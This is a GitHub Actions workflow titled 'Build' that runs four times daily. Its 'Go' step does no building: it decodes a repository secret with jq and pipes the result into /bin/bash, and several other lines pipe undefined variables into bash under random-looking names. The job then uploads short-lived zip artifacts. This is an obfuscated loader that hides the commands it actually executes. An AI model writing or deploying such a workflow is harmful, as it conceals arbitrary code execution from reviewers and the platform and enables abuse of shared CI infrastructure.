name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '15 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          idj78379: ${{ secrets.idj78379 }}
        run: |
          printf '%s' "$idj78379" | jq -r .wg40 | /bin/bash
          echo $cwo8956 | jq -r .nhzr451 | /bin/bash
          printf '%s' "$hz6" | jq -r .fjs923 | /bin/bash
          printf '%s' "$c596" | jq -r .a862 | /bin/bash
          printf '%s' "$s379" | jq -r .zoiwr3591 | /bin/bash
          echo $gr95 | jq -r .uz061 | /bin/bash
          echo $pggt06967 | jq -r .i350 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: fCGG7pdx
          path: "*.zip"
          retention-days: 1
